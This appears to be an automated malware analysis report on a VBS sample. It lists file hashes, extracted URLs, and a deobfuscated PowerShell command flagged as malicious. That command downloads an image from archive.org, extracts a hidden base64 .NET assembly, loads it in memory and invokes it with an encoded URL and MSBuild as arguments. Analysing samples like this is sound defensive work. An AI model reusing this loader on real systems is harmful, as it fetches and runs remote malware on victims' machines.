|
Hash | Hash Value |
|---|---|
| MD5 | 744880276f0cac93094e754f0130534a
|
| Sha1 | 6c995aa59e267143b11e9bbf4d6bd19930bc41cb
|
| Sha256 | 58f594c518e9fdb8834536ca003f068ef18cd17dfa7638651631f22713fa9041
|
| Sha384 | 26271fd6a03e38ba6fef6c74e888c29ba92b55e377812f7fef0f7fe84efbc21187991bdc2c1971cc935b76d28dae5986
|
| Sha512 | afd78b215e3d3ec177484249ae7f2b23f77ce18c41f73e51eea3574966618a72ad2e1b49f9afa9ec2eb8aa53c3a6eb74f5d8c037bd6c1a4dd9b1d0ac1162d5e1
|
| SSDeep | 384:/GF8Z/7p8QndpwqjLD5zt/RXpUypuH/bl32zPGEyMjj64ksm7YMI0t6hpbmmnO:p/5zt/RXpY
|
| TLSH | 2A433EC4B545774177F0394AC20C2F7CB6EA86046686753A6CBF2BDE86337D92087A9C
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | https://www.javascriptfreecode.com |
| URLs in VB Code - #2 | https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css |
| URLs in VB Code - #3 | https://fonts.googleapis.com |
| URLs in VB Code - #4 | https://fonts.gstatic.com |
| URLs in VB Code - #5 | https://fonts.googleapis.com/css2?family=Inter:wght@400 |
| URLs in VB Code - #6 | https://api.javascripttutorial.net/v1/quotes/?limit= |
| Deobfuscated PowerShell | $null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/msi-pro/MSI_PRO.jpg" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05SO1EjN5YTOiFmNxQzY4cDO5YmZ0UjMhVGOjRjYyMDOy81b2lWdxJXYv02bj5yZvxmYvR3clZ3bs5SYxADMwkzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "", "MSBuild", "", "", "", "", "C:\Users\Public\Downloads", "threepences", "", "", "", "replating", "2", "") } )) |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | https://www.javascriptfreecode.com |
744880276f0cac93094e754f0130534a |
| URLs in VB Code - #2 | https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css |
744880276f0cac93094e754f0130534a |
| URLs in VB Code - #3 | https://fonts.googleapis.com |
744880276f0cac93094e754f0130534a |
| URLs in VB Code - #4 | https://fonts.gstatic.com |
744880276f0cac93094e754f0130534a |
| URLs in VB Code - #5 | https://fonts.googleapis.com/css2?family=Inter:wght@400 |
744880276f0cac93094e754f0130534a |
| URLs in VB Code - #6 | https://api.javascripttutorial.net/v1/quotes/?limit= |
744880276f0cac93094e754f0130534a |
| Deobfuscated PowerShell | $null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/msi-pro/MSI_PRO.jpg" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05SO1EjN5YTOiFmNxQzY4cDO5YmZ0UjMhVGOjRjYyMDOy81b2lWdxJXYv02bj5yZvxmYvR3clZ3bs5SYxADMwkzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "", "MSBuild", "", "", "", "", "C:\Users\Public\Downloads", "threepences", "", "", "", "replating", "2", "") } )) Malicious |
744880276f0cac93094e754f0130534a > 744880276f0cac93094e754f0130534a.deobfuscated.vbs > [Command #0] > [Base64-Block] |